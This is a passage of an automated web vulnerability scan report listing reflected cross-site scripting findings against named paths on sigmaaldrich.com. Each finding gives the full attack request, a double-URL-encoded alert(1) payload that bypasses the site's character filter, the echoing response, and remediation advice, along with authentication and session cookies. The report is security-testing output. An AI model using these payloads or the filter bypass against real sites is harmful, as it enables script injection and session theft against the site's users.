GET /etce7876%2522%253balert%25281%2529%252f%252f68b0607b97f/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:20 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etce7876";alert(1)//68b0607b97f/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.279. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98b2b%2522%253balert%25281%2529%252f%252fd06e6a724d2 was submitted in the REST URL parameter 2. This input was echoed as 98b2b";alert(1)//d06e6a724d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib98b2b%2522%253balert%25281%2529%252f%252fd06e6a724d2/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:25 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib98b2b";alert(1)//d06e6a724d2/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.280. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86950%2522%253balert%25281%2529%252f%252f3a18cbc134e was submitted in the REST URL parameter 3. This input was echoed as 86950";alert(1)//3a18cbc134e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs86950%2522%253balert%25281%2529%252f%252f3a18cbc134e/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:34 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs86950";alert(1)//3a18cbc134e/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.281. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b2c2%2522%253balert%25281%2529%252f%252fa3cc5989315 was submitted in the REST URL parameter 4. This input was echoed as 9b2c2";alert(1)//a3cc5989315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich9b2c2%2522%253balert%25281%2529%252f%252fa3cc5989315/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich9b2c2";alert(1)//a3cc5989315/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.282. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f4d4%2522%253balert%25281%2529%252f%252ff7f2f7abc80 was submitted in the REST URL parameter 5. This input was echoed as 3f4d4";alert(1)//f7f2f7abc80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure3f4d4%2522%253balert%25281%2529%252f%252ff7f2f7abc80/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:41 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure3f4d4";alert(1)//f7f2f7abc80/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.283. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba5ea%2522%253balert%25281%2529%252f%252f39be17f4157 was submitted in the REST URL parameter 6. This input was echoed as ba5ea";alert(1)//39be17f4157 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

